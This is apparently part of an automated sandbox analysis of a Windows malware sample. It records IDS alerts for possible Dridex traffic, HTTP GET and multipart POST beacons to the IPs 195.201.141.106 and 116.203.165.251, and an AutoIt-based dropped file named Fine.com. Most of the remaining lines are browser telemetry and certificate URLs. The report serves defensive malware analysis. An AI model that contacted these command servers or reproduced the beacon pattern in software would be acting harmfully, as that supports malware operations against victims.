          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50134 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50142 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50137 -> 195.201.141.106:443
          Source: unknown, TCP traffic detected without corresponding DNS query: 195.201.141.106
          Source: unknown, TCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com Code function: 11_2_0024D889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_0024D889
          Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 195.201.141.106 Connection: Keep-Alive Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /b?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1
          Source: global trafficHTTP traffic detected: GET /b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1EA27ce3b1ee0d790c63e791736698994; XID=1EA27ce3b1ee0d790c63e791736698994
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9C9B0C5E00C44C8A8B186E4587E0FF4B&MUID=0DA5835E35016A581E46962C34736B24 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; SM=T; _C_ETH=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
          Source: 000003.log7.20.dr String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
          Source: 000003.log7.20.dr String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
          Source: 000003.log7.20.dr String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000F.00000003.2555015799.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2554814875.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2554414550.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style 
include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: global traffic DNS traffic detected: DNS query: LBkgcUFdJvUBmfKVwVgI.LBkgcUFdJvUBmfKVwVgI
          Source: global traffic DNS traffic detected: DNS query: www.google.com
          Source: global traffic DNS traffic detected: DNS query: apis.google.com
          Source: global traffic DNS traffic detected: DNS query: play.google.com
          Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
          Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
          Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global traffic DNS traffic detected: DNS query: assets.msn.com
          Source: global traffic DNS traffic detected: DNS query: c.msn.com
          Source: global traffic DNS traffic detected: DNS query: api.msn.com
          Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLN Host: 195.201.141.106 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
          Source: mNPTwHOuvT.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: mNPTwHOuvT.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: mNPTwHOuvT.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: mNPTwHOuvT.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: mNPTwHOuvT.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: mNPTwHOuvT.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: mNPTwHOuvT.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: mNPTwHOuvT.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: mNPTwHOuvT.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
          Source: chrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
          Source: mNPTwHOuvT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: mNPTwHOuvT.exeString found in binary or memory: http://ocsp.digicert.com0
          Source: mNPTwHOuvT.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: mNPTwHOuvT.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: mNPTwHOuvT.exeString found in binary or memory: http://ocsp.digicert.com0X
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: chrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555996433.000003C8011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C80106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556765584.000003C800A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556827234.000003C800EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
          Source: chrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555996433.000003C8011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C80106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556765584.000003C800A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556827234.000003C800EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
          Source: chrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555996433.000003C8011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C80106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556765584.000003C800A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556827234.000003C800EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555996433.000003C8011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C80106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556765584.000003C800A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556827234.000003C800EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: Fine.com, 0000000B.00000000.2087146090.00000000002A5000.00000002.00000001.01000000.00000009.sdmp, Closely.0.dr, Fine.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
          Source: mNPTwHOuvT.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://116.203.165.251
